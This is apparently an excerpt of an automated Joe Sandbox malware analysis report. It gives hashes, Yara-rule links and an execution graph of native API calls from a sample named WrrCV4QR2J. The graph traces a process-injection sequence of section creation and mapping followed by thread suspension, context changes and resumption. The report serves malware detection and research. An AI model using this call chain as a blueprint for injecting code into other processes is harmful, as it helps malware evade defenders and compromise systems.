                                                                                                                                                              • Instruction ID: 34f912b0e28b30ea7f2dbc6c64adffe94b48c82c4a75462565d4890174243229
                                                                                                                                                              • Opcode Fuzzy Hash: 4741fca59a9a1487279f8ce930a17fed889de050f572bff5f0a7ff125c81c2c0
                                                                                                                                                              • Instruction Fuzzy Hash: 13122E30A9121A8FCB4CEF75E9516DEBBB2FF44300F5195A8D04AAB264DF306989CF51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054FC710 Relevance: 41.7, Strings: 33, Instructions: 434COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                              • API String ID: 0-2697097662
                                                                                                                                                              • Opcode ID: 5e0d8d796ae278bb4c3cd3fd18b560a8721a5efe8684197082bfb8430c1f6366
                                                                                                                                                              • Instruction ID: 8a6af7fb1edf8a81e87afee9347abd4f319e7d24420e34dddaab0ab44a23be6b
                                                                                                                                                              • Opcode Fuzzy Hash: 5e0d8d796ae278bb4c3cd3fd18b560a8721a5efe8684197082bfb8430c1f6366
                                                                                                                                                              • Instruction Fuzzy Hash: 22122E30A9121A8FCB4CEF75E9516DEBBB2FF44300F5095A8D04AAB264DF306989CF51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054F7BCF Relevance: 12.7, Strings: 10, Instructions: 178COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                              • API String ID: 0-518715366
                                                                                                                                                              • Opcode ID: 58802580c7d7173d92da55ab262dd34154f4050869a64565c9cb5b49df224d2e
                                                                                                                                                              • Instruction ID: f382075af4f98ec7b9c529419e12f9a0bcb326ec45cb8e1ab65e27e9e22d28a8
                                                                                                                                                              • Opcode Fuzzy Hash: 58802580c7d7173d92da55ab262dd34154f4050869a64565c9cb5b49df224d2e
                                                                                                                                                              • Instruction Fuzzy Hash: E7713D31D5031A9FCB08EFA5D8545DEB7B2FF95300F609A29D0456B268DF70698ACB81
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054F7BE0 Relevance: 12.7, Strings: 10, Instructions: 172COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                              • API String ID: 0-518715366
                                                                                                                                                              • Opcode ID: be99f737033dd4aaa908df9276c09586491de137cb803ac9feea3483189f55ec
                                                                                                                                                              • Instruction ID: 4d4d6b89a3910c54b6930f6a663e935dbcc08cd7dffe1138be5b373f8a79339b
                                                                                                                                                              • Opcode Fuzzy Hash: be99f737033dd4aaa908df9276c09586491de137cb803ac9feea3483189f55ec
                                                                                                                                                              • Instruction Fuzzy Hash: F4712C31D5031A9FCB08EFA6D8545DEF7B2FF95300F609A29D0456B268DF70698ACB81
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054F5F41 Relevance: 7.6, Strings: 6, Instructions: 99COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                              • API String ID: 0-2822668367
                                                                                                                                                              • Opcode ID: 88c2b0485f4a2e2508f3c3fa395f6a572f80b4b93b1e62c69c768e498eb0a8c1
                                                                                                                                                              • Instruction ID: e5dd85562897bd35d30575cd2ee169a91719d7bbf16ae608ab52c0d9b0b1fb42
                                                                                                                                                              • Opcode Fuzzy Hash: 88c2b0485f4a2e2508f3c3fa395f6a572f80b4b93b1e62c69c768e498eb0a8c1
                                                                                                                                                              • Instruction Fuzzy Hash: 6C414670A1120A8FCB4CEF65E5525EF7BB2FB44304BA055A9E0059B2ACEF386D45CF91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 054F5F50 Relevance: 7.6, Strings: 6, Instructions: 95COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                              • API String ID: 0-2822668367
                                                                                                                                                              • Opcode ID: ee59effcd8e453bada71b783eecdfac0cf69fb56e9eeaec601532ad1a15d3cb5
                                                                                                                                                              • Instruction ID: f9c4f47a5bc39afd6185d936109139d5e7dafb842bef2564db216f75c24143bd
                                                                                                                                                              • Opcode Fuzzy Hash: ee59effcd8e453bada71b783eecdfac0cf69fb56e9eeaec601532ad1a15d3cb5
                                                                                                                                                              • Instruction Fuzzy Hash: 25415730A1120A8FCB4CEF65E5525EF7BB2FB44304BA055A9E0059B2ACEF386D45CF91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:1.4%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:1.8%
                                                                                                                                                              Signature Coverage:11.1%
                                                                                                                                                              Total number of Nodes:397
                                                                                                                                                              Total number of Limit Nodes:35
                                                                                                                                                              execution_graph 88187 42b363 88188 42b373 88187->88188 88189 42b379 88187->88189 88192 42a363 88189->88192 88191 42b39f 88195 428713 88192->88195 88194 42a37e 88194->88191 88196 42872d 88195->88196 88199 429463 88196->88199 88198 42873e RtlAllocateHeap 88198->88194 88200 429472 88199->88200 88201 4294d8 88199->88201 88200->88201 88203 423e53 88200->88203 88201->88198 88204 423e61 88203->88204 88205 423e6d 88203->88205 88204->88205 88208 4242d3 LdrLoadDll 88204->88208 88205->88201 88207 423fbf 88207->88201 88208->88207 88209 4239c3 88210 4239df 88209->88210 88221 428143 88210->88221 88213 423a07 88215 428453 2 API calls 88213->88215 88214 423a1b 88225 428453 88214->88225 88217 423a10 88215->88217 88218 423a24 88229 42a3a3 LdrLoadDll RtlAllocateHeap 88218->88229 88220 423a2f 88222 428160 88221->88222 88223 429463 LdrLoadDll 88222->88223 88224 423a00 88223->88224 88224->88213 88224->88214 88226 428470 88225->88226 88227 429463 LdrLoadDll 88226->88227 88228 428481 NtClose 88227->88228 88228->88218 88229->88220 88230 4281e3 88231 42825d 88230->88231 88232 428207 88230->88232 88233 429463 LdrLoadDll 88231->88233 88234 429463 LdrLoadDll 88232->88234 88235 428273 88233->88235 88236 428221 88234->88236 88239 40ab73 88236->88239 88238 428256 88241 40ab95 88239->88241 88240 40acb2 NtCreateFile 88242 40acf1 88240->88242 88241->88240 88242->88238 88542 423d53 88547 423d62 88542->88547 88543 423de9 88544 423da6 88545 42a283 2 API calls 88544->88545 88546 423db6 88545->88546 88547->88543 88547->88544 88548 423de4 88547->88548 88549 42a283 2 API calls 88548->88549 88549->88543 88550 428313 88551 428337 88550->88551 88552 428385 88550->88552 88553 429463 LdrLoadDll 88551->88553 88554 429463 LdrLoadDll 88552->88554 88555 428351 88553->88555 88556 42839b 88554->88556 88559 40ada3 88555->88559 88558 42837e 88561 40adc5 88559->88561 88560 40aee2 NtReadFile 88562 40af19 88560->88562 88561->88560 88562->88558 88563 41d653 88564 41d679 88563->88564 88565 423e53 LdrLoadDll 88564->88565 88566 41d6cd 88565->88566 88572 41da46 88566->88572 88610 4287f3 LdrLoadDll 88566->88610 88568 41d71e 88569 41da2e 88568->88569 88611 42b493 88568->88611 88570 42a283 2 API calls 88569->88570 88570->88572 88573 41d73d 88573->88569 88574 41d846 88573->88574 88575 427bb3 2 API calls 88573->88575 88617 418713 LdrLoadDll LdrInitializeThunk 88574->88617 88576 41d7c4 88575->88576 88576->88574 88581 41d7cc 88576->88581 88578 41d871 88578->88569 88583 41d8a6 88578->88583 88620 418603 NtMapViewOfSection LdrLoadDll 88578->88620 88579 41d82c 88580 42a283 2 API calls 88579->88580 88584 41d83c 88580->88584 88581->88572 88581->88579 88582 41d7fb 88581->88582 88618 418603 NtMapViewOfSection LdrLoadDll 88581->88618 88587 428453 2 API calls 88582->88587 88590 41d8d6 88583->88590 88591 41da0d 88583->88591 88588 41d80b 88587->88588 88619 4259a3 NtDelayExecution LdrLoadDll 88588->88619 88621 4284f3 LdrLoadDll 88590->88621 88593 42a283 2 API calls 88591->88593 88594 41da24 88593->88594 88595 41d8f5 88596 41a4a3 3 API calls 88595->88596 88597 41d95e 88596->88597 88597->88569 88598 41d969 88597->88598 88599 42a283 2 API calls 88598->88599 88600 41d98d 88599->88600 88622 427e13 LdrLoadDll 88600->88622 88602 41d9a1 88603 427d53 2 API calls 88602->88603 88604 41d9c8 88603->88604 88605 41d9cf 88604->88605 88623 427e13 LdrLoadDll 88604->88623 88607 41d9f5 88608 4279c3 2 API calls 88607->88608 88609 41da03 88608->88609 88610->88568 88612 42b403 88611->88612 88613 42a363 2 API calls 88612->88613 88616 42b460 88612->88616 88614 42b43d 88613->88614 88615 42a283 2 API calls 88614->88615 88615->88616 88616->88573 88617->88578 88618->88582 88619->88579 88620->88583 88621->88595 88622->88602 88623->88607 88624 41a5f3 88632 4277b3 88624->88632 88626 41a637 88627 41a658 88626->88627 88639 427943 88626->88639 88629 41a648 88630 41a664 88629->88630 88631 428453 2 API calls 88629->88631 88631->88627 88633 4277d4 88632->88633 88634 42780e 88632->88634 88635 429463 LdrLoadDll 88633->88635 88636 429463 LdrLoadDll 88634->88636 88638 4277ee 88635->88638 88637 427824 88636->88637 88637->88626 88638->88626 88640 427967 88639->88640 88641 427999 88639->88641 88643 429463 LdrLoadDll 88640->88643 88642 429463 LdrLoadDll 88641->88642 88645 4279af 88642->88645 88644 427981 88643->88644 88648 409d23 88644->88648 88645->88629 88647 427992 88647->88629 88651 409d45 88648->88651 88649 409e62 NtSuspendThread 88650 409e7d 88649->88650 88650->88647 88651->88649 88652 413bf3 88653 413c0d 88652->88653 88660 4173f3 88653->88660 88655 413c2b 88656 423e53 LdrLoadDll 88655->88656 88657 413c41 88656->88657 88658 413c70 88657->88658 88659 413c5f PostThreadMessageW 88657->88659 88659->88658 88661 417417 88660->88661 88662 417453 LdrLoadDll 88661->88662 88663 41741e 88661->88663 88662->88663 88663->88655 88664 4185d8 88665 428453 2 API calls 88664->88665 88666 4185e2 88665->88666 88667 15b2b60 LdrInitializeThunk 88243 401b2f 88244 401b44 88243->88244 88247 42b803 88244->88247 88250 429e73 88247->88250 88251 429e99 88250->88251 88262 416323 88251->88262 88253 429eaf 88261 401b99 88253->88261 88265 41a413 88253->88265 88255 429ece 88256 429ee3 88255->88256 88281 4287b3 88255->88281 88277 426253 88256->88277 88259 429ef2 88260 4287b3 2 API calls 88259->88260 88260->88261 88264 416330 88262->88264 88285 416273 88262->88285 88264->88253 88266 41a43f 88265->88266 88323 417783 88266->88323 88268 41a451 88327 41a303 88268->88327 88271 41a484 88274 41a495 88271->88274 88276 428453 2 API calls 88271->88276 88272 41a46c 88273 41a477 88272->88273 88275 428453 2 API calls 88272->88275 88273->88255 88274->88255 88275->88273 88276->88274 88278 4262ad 88277->88278 88280 4262ba 88278->88280 88355 417f23 88278->88355 88280->88259 88282 4287cd 88281->88282 88283 429463 LdrLoadDll 88282->88283 88284 4287de ExitProcess 88283->88284 88284->88256 88286 41628a 88285->88286 88302 425313 LdrLoadDll 88285->88302 88292 425373 88286->88292 88289 416296 88291 4162a3 88289->88291 88295 428df3 88289->88295 88291->88264 88303 4286d3 88292->88303 88297 428e0b 88295->88297 88296 428e2f 88296->88291 88297->88296 88307 427bb3 88297->88307 88302->88286 88304 4286ed 88303->88304 88305 429463 LdrLoadDll 88304->88305 88306 425390 88305->88306 88306->88289 88308 427bd0 88307->88308 88309 429463 LdrLoadDll 88308->88309 88310 427be1 88309->88310 88316 15b2c0a 88310->88316 88311 427bfc 88313 42a283 88311->88313 88319 428763 88313->88319 88315 428e9a 88315->88291 88317 15b2c1f LdrInitializeThunk 88316->88317 88318 15b2c11 88316->88318 88317->88311 88318->88311 88320 428780 88319->88320 88321 429463 LdrLoadDll 88320->88321 88322 428791 RtlFreeHeap 88321->88322 88322->88315 88324 4177c9 88323->88324 88337 417613 LdrLoadDll 88324->88337 88326 41785c 88326->88268 88328 41a31d 88327->88328 88336 41a3f9 88327->88336 88338 4176d3 88328->88338 88330 41a362 88343 427c03 88330->88343 88332 41a3a7 88347 427c53 88332->88347 88335 428453 2 API calls 88335->88336 88336->88271 88336->88272 88337->88326 88339 4176f8 88338->88339 88342 417703 88339->88342 88353 417613 LdrLoadDll 88339->88353 88341 41774b 88341->88330 88342->88330 88344 427c20 88343->88344 88345 429463 LdrLoadDll 88344->88345 88346 427c31 88345->88346 88346->88332 88348 427c70 88347->88348 88349 429463 LdrLoadDll 88348->88349 88350 427c81 88349->88350 88354 15b35c0 LdrInitializeThunk 88350->88354 88351 41a3ed 88351->88335 88353->88341 88354->88351 88356 417f4d 88355->88356 88380 4183bb 88356->88380 88381 423363 88356->88381 88358 417fec 88358->88380 88384 413d23 88358->88384 88360 41805a 88361 42a283 2 API calls 88360->88361 88360->88380 88364 418072 88361->88364 88362 4180a4 88368 4180ab 88362->88368 88401 41a4a3 88362->88401 88364->88362 88397 406cc3 88364->88397 88365 4180e4 88365->88380 88408 427d53 88365->88408 88368->88380 88417 427843 88368->88417 88370 418141 88426 4278c3 88370->88426 88372 418161 88373 41834a 88372->88373 88435 406d33 88372->88435 88376 41836d 88373->88376 88443 4279c3 88373->88443 88378 41838a 88376->88378 88439 41a673 88376->88439 88379 4287b3 2 API calls 88378->88379 88379->88380 88380->88280 88452 42a1f3 88381->88452 88383 423384 88383->88358 88386 413d89 88384->88386 88387 413d42 88384->88387 88385 413e97 88385->88360 88386->88385 88396 413e60 88386->88396 88468 4134c3 88386->88468 88387->88385 88387->88386 88391 41a673 2 API calls 88387->88391 88390 413e74 88390->88385 88485 41a713 LdrLoadDll RtlFreeHeap LdrInitializeThunk 88390->88485 88391->88387 88393 413e8d 88393->88360 88394 413dc6 88394->88396 88481 413783 88394->88481 88396->88385 88484 41a713 LdrLoadDll RtlFreeHeap LdrInitializeThunk 88396->88484 88398 406cf3 88397->88398 88399 41a673 2 API calls 88398->88399 88400 406d14 88398->88400 88399->88398 88400->88362 88402 41a4c0 88401->88402 88500 427ca3 88402->88500 88404 41a510 88405 41a517 88404->88405 88406 427d53 2 API calls 88404->88406 88405->88365 88407 41a540 88406->88407 88407->88365 88409 427d74 88408->88409 88410 427dc6 88408->88410 88411 429463 LdrLoadDll 88409->88411 88412 429463 LdrLoadDll 88410->88412 88413 427d8e 88411->88413 88414 427ddc 88412->88414 88513 40a953 88413->88513 88414->88368 88416 427dbf 88416->88368 88418 427896 88417->88418 88419 427864 88417->88419 88420 429463 LdrLoadDll 88418->88420 88421 429463 LdrLoadDll 88419->88421 88425 4278ac 88420->88425 88422 42787e 88421->88422 88517 409f23 88422->88517 88424 42788f 88424->88370 88425->88370 88427 4278e7 88426->88427 88428 427919 88426->88428 88430 429463 LdrLoadDll 88427->88430 88429 429463 LdrLoadDll 88428->88429 88431 42792f 88429->88431 88432 427901 88430->88432 88431->88372 88521 40a123 88432->88521 88434 427912 88434->88372 88436 406d53 88435->88436 88437 41a673 2 API calls 88436->88437 88438 406d73 88436->88438 88437->88436 88438->88373 88440 41a686 88439->88440 88525 427ae3 88440->88525 88442 41a6b1 88442->88376 88444 427a19 88443->88444 88445 4279e7 88443->88445 88447 429463 LdrLoadDll 88444->88447 88446 429463 LdrLoadDll 88445->88446 88448 427a01 88446->88448 88449 427a2f 88447->88449 88538 40a323 88448->88538 88449->88376 88451 427a12 88451->88376 88455 428593 88452->88455 88454 42a224 88454->88383 88456 4285f6 88455->88456 88457 4285b4 88455->88457 88458 429463 LdrLoadDll 88456->88458 88459 429463 LdrLoadDll 88457->88459 88460 42860c 88458->88460 88461 4285ce 88459->88461 88460->88454 88464 40b623 88461->88464 88463 4285ef 88463->88454 88467 40b645 88464->88467 88465 40b762 NtAllocateVirtualMemory 88466 40b78d 88465->88466 88466->88463 88467->88465 88469 4134d3 88468->88469 88470 4134ce 88468->88470 88471 42a1f3 2 API calls 88469->88471 88470->88394 88477 4134f8 88471->88477 88472 41355f 88472->88394 88474 413565 88476 41358f 88474->88476 88478 428683 2 API calls 88474->88478 88476->88394 88477->88472 88477->88474 88479 42a1f3 2 API calls 88477->88479 88486 427b63 88477->88486 88492 428683 88477->88492 88480 413580 88478->88480 88479->88477 88480->88394 88482 428683 2 API calls 88481->88482 88483 4137a5 88482->88483 88483->88396 88484->88390 88485->88393 88487 427b80 88486->88487 88488 429463 LdrLoadDll 88487->88488 88489 427b91 88488->88489 88498 15b2df0 LdrInitializeThunk 88489->88498 88490 427ba8 88490->88477 88493 42869d 88492->88493 88494 429463 LdrLoadDll 88493->88494 88495 4286ae 88494->88495 88499 15b2c70 LdrInitializeThunk 88495->88499 88496 4286c5 88496->88477 88498->88490 88499->88496 88501 427cc4 88500->88501 88502 427d0a 88500->88502 88503 429463 LdrLoadDll 88501->88503 88504 429463 LdrLoadDll 88502->88504 88505 427cde 88503->88505 88507 427d20 88504->88507 88509 40a733 88505->88509 88507->88404 88508 427d03 88508->88404 88512 40a755 88509->88512 88510 40a872 NtCreateSection 88511 40a8a1 88510->88511 88511->88508 88512->88510 88515 40a975 88513->88515 88514 40aa92 NtMapViewOfSection 88516 40aacd 88514->88516 88515->88514 88516->88416 88519 409f45 88517->88519 88518 40a062 NtGetContextThread 88520 40a07d 88518->88520 88519->88518 88520->88424 88523 40a145 88521->88523 88522 40a262 NtSetContextThread 88524 40a27d 88522->88524 88523->88522 88524->88434 88526 427b07 88525->88526 88527 427b39 88525->88527 88529 429463 LdrLoadDll 88526->88529 88528 429463 LdrLoadDll 88527->88528 88530 427b4f 88528->88530 88531 427b21 88529->88531 88530->88442 88534 40b213 88531->88534 88533 427b32 88533->88442 88537 40b235 88534->88537 88535 40b352 NtDelayExecution 88536 40b36e 88535->88536 88536->88533 88537->88535 88540 40a345 88538->88540 88539 40a462 NtResumeThread 88541 40a47d 88539->88541 88540->88539 88541->88451

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 0040A323 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170nativethreadCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • NtResumeThread.NTDLL(%o@,?,?,?,?), ref: 0040A46A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                              • String ID: %o@$%o@
                                                                                                                                                              • API String ID: 947044025-618112537
                                                                                                                                                              • Opcode ID: 9a8e4d286178fea2a4a6c4b3173bc6d9a17118359cd30a0f8428712cc09e4e8b
                                                                                                                                                              • Instruction ID: a180d3cde8570c79af263549b5a123663d1f596594efc184d6facc428f3df757
                                                                                                                                                              • Opcode Fuzzy Hash: 9a8e4d286178fea2a4a6c4b3173bc6d9a17118359cd30a0f8428712cc09e4e8b
                                                                                                                                                              • Instruction Fuzzy Hash: EA715D75E04258DFCB04CFA9D484AEDBBF1BF49304F1880AAE459B7341D238A952DF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040A733 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180nativeCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 100 40a733-40a74f 101 40a755-40a794 call 4097d3 100->101 102 40a750 call 4097c3 100->102 105 40a872-40a89b NtCreateSection 101->105 106 40a79a-40a7df call 409863 call 42b882 call 409733 call 42b882 101->106 102->101 108 40a8a1-40a8a8 105->108 109 40a938-40a944 105->109 128 40a7ea-40a7f0 106->128 111 40a8b3-40a8b9 108->111 113 40a8e1-40a8e5 111->113 114 40a8bb-40a8df 111->114 117 40a927-40a935 call 409863 113->117 118 40a8e7-40a8ee 113->118 114->111 117->109 120 40a8f9-40a8ff 118->120 120->117 123 40a901-40a925 120->123 123->120 129 40a7f2-40a816 128->129 130 40a818-40a81c 128->130 129->128 130->105 132 40a81e-40a839 130->132 133 40a844-40a84a 132->133 133->105 134 40a84c-40a870 133->134 134->133
                                                                                                                                                              APIs
                                                                                                                                                              • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,An@,00000000,?,?,08000000), ref: 0040A88E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateSection
                                                                                                                                                              • String ID: An@
                                                                                                                                                              • API String ID: 2449625523-62601564
                                                                                                                                                              • Opcode ID: 3131d5dc1d820d0612834a904be202933f8669efa2cfcc61d350db917952ab80
                                                                                                                                                              • Instruction ID: 41a694da47314c6f7953bebff27000536f1853d4fe1618860b860f471416e69f
                                                                                                                                                              • Opcode Fuzzy Hash: 3131d5dc1d820d0612834a904be202933f8669efa2cfcc61d350db917952ab80
                                                                                                                                                              • Instruction Fuzzy Hash: 36713BB1E04258DFCB04DFA9C490AEDBBF5BF49304F18816AE859B7341D238AA52CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040AB73 Relevance: 1.7, APIs: 1, Instructions: 188filenativeCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 145 40ab73-40abd4 call 4097c3 call 4097d3 150 40acb2-40aceb NtCreateFile 145->150 151 40abda-40ac1f call 409863 call 42b882 call 409733 call 42b882 145->151 153 40acf1-40acf8 150->153 154 40ad88-40ad94 150->154 173 40ac2a-40ac30 151->173 156 40ad03-40ad09 153->156 158 40ad31-40ad35 156->158 159 40ad0b-40ad2f 156->159 162 40ad77-40ad85 call 409863 158->162 163 40ad37-40ad3e 158->163 159->156 162->154 164 40ad49-40ad4f 163->164 164->162 167 40ad51-40ad75 164->167 167->164 174 40ac32-40ac56 173->174 175 40ac58-40ac5c 173->175 174->173 175->150 177 40ac5e-40ac79 175->177 178 40ac84-40ac8a 177->178 178->150 179 40ac8c-40acb0 178->179 179->178
                                                                                                                                                              APIs
                                                                                                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040ACDE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: 8ab9d362cc5fb06384091f6af35ac9f3ea333ab5dfcc3f011468464862423996
                                                                                                                                                              • Instruction ID: 1c07fbbcbdb6f1aea2f7691a6cf0475e8e686830d361e3a4b3f409b1fbea8beb
                                                                                                                                                              • Opcode Fuzzy Hash: 8ab9d362cc5fb06384091f6af35ac9f3ea333ab5dfcc3f011468464862423996
                                                                                                                                                              • Instruction Fuzzy Hash: BB814DB1E14258DFCB04CFA9C490AEDBBF5AF4D304F18816AE859B7341D238A952CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040A953 Relevance: 1.7, APIs: 1, Instructions: 186nativeCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 181 40a953-40a9b4 call 4097c3 call 4097d3 186 40aa92-40aac7 NtMapViewOfSection 181->186 187 40a9ba-40a9ff call 409863 call 42b882 call 409733 call 42b882 181->187 189 40ab64-40ab70 186->189 190 40aacd-40aad4 186->190 209 40aa0a-40aa10 187->209 192 40aadf-40aae5 190->192 194 40aae7-40ab0b 192->194 195 40ab0d-40ab11 192->195 194->192 198 40ab53-40ab61 call 409863 195->198 199 40ab13-40ab1a 195->199 198->189 201 40ab25-40ab2b 199->201 201->198 204 40ab2d-40ab51 201->204 204->201 210 40aa12-40aa36 209->210 211 40aa38-40aa3c 209->211 210->209 211->186 213 40aa3e-40aa59 211->213 214 40aa64-40aa6a 213->214 214->186 215 40aa6c-40aa90 214->215 215->214
                                                                                                                                                              APIs
                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00406E84,?,?,?,00000000), ref: 0040AABA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: SectionView
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1323581903-0
                                                                                                                                                              • Opcode ID: 42e425ea6a7462443631d8b6a0a837e093257fc2e9c0202ad7f6345b11b57f9c
                                                                                                                                                              • Instruction ID: 8c108c30a1503a35fa8a721594d6fd6207328e0511ed23d5626443ae9fe78b90
                                                                                                                                                              • Opcode Fuzzy Hash: 42e425ea6a7462443631d8b6a0a837e093257fc2e9c0202ad7f6345b11b57f9c
                                                                                                                                                              • Instruction Fuzzy Hash: FE713A71E04258DFCB04CFA9C590AEDBBF6AF4D304F18816AE459B7381D238A952CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040ADA3 Relevance: 1.7, APIs: 1, Instructions: 184filenativeCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
